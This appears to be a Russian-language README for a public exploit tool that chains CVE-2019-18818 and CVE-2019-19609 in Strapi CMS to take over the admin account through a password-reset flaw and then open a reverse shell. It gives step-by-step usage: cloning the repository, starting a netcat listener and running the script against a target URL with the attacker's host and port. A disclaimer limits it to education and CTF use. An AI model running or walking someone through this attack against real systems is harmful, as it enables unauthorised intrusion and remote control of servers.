
Эксплойт-скрипт, демонстрирующий комбинацию CVE-2019-18818 и CVE-2019-19609 для неаутентифицированного удаленного выполнения кода в Strapi CMS.
Эксплойт-скрипт, демонстрирующий комбинацию CVE-2019-18818 и CVE-2019-19609 для неавторизованного удаленного выполнения кода в Strapi CMS.
Этот скрипт эксплуатирует уязвимость в Strapi CMS версий 3.0.0-beta.17.4 и ниже, позволяющую неавторизованное удаленное выполнение кода.
Эксплойт работает следующим образом: сначала используется уязвимость сброса пароля для получения JSON Web Token (JWT) для административного пользователя. Затем этот токен используется для отправки вредоносной нагрузки в Strapi CMS, которая запускает обратную оболочку на машину атакующего.
Клонируйте репозиторий:
git clone https://github.com/Hackhoven/Strapi-RCE.git
Перейдите в директорию
cd Strapi-RCE/
Настройте прослушиватель Netcat
nc -nlvp <LPORT>
Запустите скрипт, передав целевой URL, IP-адрес локального хоста и порт локального хоста в качестве аргументов
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
Этот скрипт предназначен только для образовательных целей. Автор не одобряет и не поддерживает использование этого скрипта для незаконных или неэтичных действий. Этот скрипт следует использовать только в легальных исследованиях безопасности или в средах CTF. Используйте на свой страх и риск.
Сделано Hackhoven